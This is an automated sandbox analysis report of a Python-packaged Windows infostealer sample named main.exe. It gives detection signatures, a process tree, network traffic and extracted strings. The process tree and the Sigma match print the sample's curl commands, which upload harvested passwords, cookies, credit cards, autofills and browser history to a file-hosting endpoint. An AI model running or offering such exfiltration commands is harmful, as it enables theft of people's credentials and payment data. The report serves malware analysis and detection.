Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
main.exe

Overview

General Information

Sample name:main.exe
Analysis ID:1579350
MD5:c0e4c8f676e781c9dd3d57ffa4f99111
SHA1:94a6f60949f38da538b5227722698dd880961bb2
SHA256:9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
Tags:exeuser-JaffaCakes118
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found pyInstaller with non standard icon
Tries to harvest and steal browser information (history, passwords, etc)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • main.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\main.exe" MD5: C0E4C8F676E781C9DD3D57FFA4F99111)
    • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • main.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\main.exe" MD5: C0E4C8F676E781C9DD3D57FFA4F99111)
      • cmd.exe (PID: 4500 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 7012 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 5808 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 3940 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 7052 cmdline: C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 7152 cmdline: wmic path softwarelicensingservice get OA3xOriginalProductKey MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3868 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 648 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 7012 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 4092 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 648 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 3868 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 4852 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 7104 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 4476 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile", CommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe", ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7084, ParentProcessName: main.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile", ProcessId: 5576, ProcessName: cmd.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: main.exeAvira: detected
Source: main.exeVirustotal: Detection: 23%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\MarkupSafe-3.0.2.dist-info\LICENSE.txtJump to behavior
Source: main.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1730318775.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.1966975861.00000237BBB18000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1951939733.000001ED8A2DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.1966975861.00000237BBB18000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1951939733.000001ED8A2DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1730126342.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1730126342.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.1952863479.000001ED8BCB0000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1730318775.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA48840 FindFirstFileExW,FindClose,0_2_00007FF6ABA48840
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA47800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6ABA47800
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA62AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6ABA62AE4
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox ViewIP Address: 45.112.123.126 45.112.123.126
Source: unknownDNS query: name: ip-api.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /servers HTTP/1.1Accept-Encoding: identityHost: api.gofile.ioUser-Agent: Python-urllib/3.11Connection: close
Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflate, br, zstdAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189?fields=192511 HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflate, br, zstdAccept: */*Connection: keep-alive
Source: global trafficDNS traffic detected: DNS query: api.gofile.io
Source: global trafficDNS traffic detected: DNS query: ip-api.com
Source: main.exe, 00000002.00000003.1780531437.000001ED8CACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27
Source: main.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928622951.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911808962.000001ED8D4EF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930531879.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935934101.000001ED8D81A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931211381.000001ED8D840000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930747460.000001ED8D8A6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1962816126.000001ED8D841000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929669509.000001ED8D4F2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926909734.000001ED8D4F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1949750996.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904753768.000001ED8D880000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924199076.000001ED8D82E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1950364654.000001ED8D4E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907759919.000001ED8D82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: main.exe, 00000002.00000003.1934763372.000001ED8C168000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927169765.000001ED8CB1A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1774768079.000001ED8C162000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779904706.000001ED8CB13000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1776491892.000001ED8C158000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1954434537.000001ED8C168000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922546528.000001ED8CB18000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926693211.000001ED8C168000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780531437.000001ED8CB13000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911606040.000001ED8C163000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1921959717.000001ED8C165000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1905466567.000001ED8D261000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928904790.000001ED8CB1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: main.exe, 00000002.00000003.1921388674.000001ED8C836000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1774713857.000001ED8C90C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929545872.000001ED8C83E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926099215.000001ED8C837000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1774617594.000001ED8C8D3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1910632349.000001ED8C832000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928571941.000001ED8C83D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C82C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1773049141.000001ED8C8F3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1776106217.000001ED8C82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1773049141.000001ED8C8A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
Source: main.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925833686.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961782194.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1921292444.000001ED8D705000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941583881.000001ED8D4DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: main.exe, 00000002.00000003.1907108713.000001ED8C09B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904551547.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1953997816.000001ED8C0F2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1943627520.000001ED8C0EF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1946625856.000001ED8C0F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1910585886.000001ED8C0E9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926938744.000001ED8D426000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1908482065.000001ED8C0DF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911454026.000001ED8C0ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924258484.000001ED8C0EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: main.exe, 00000002.00000003.1951087349.000001ED8D492000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1960296876.000001ED8D495000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926784116.000001ED8D488000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1934949023.000001ED8D48D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: main.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925833686.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961782194.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1921292444.000001ED8D705000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941583881.000001ED8D4DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: main.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941583881.000001ED8D4DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlqH
Source: main.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: main.exe, 00000002.00000003.1934949023.000001ED8D484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: main.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: main.exe, 00000002.00000002.1960197370.000001ED8D47B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: main.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: main.exe, 00000002.00000003.1904551547.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926938744.000001ED8D426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
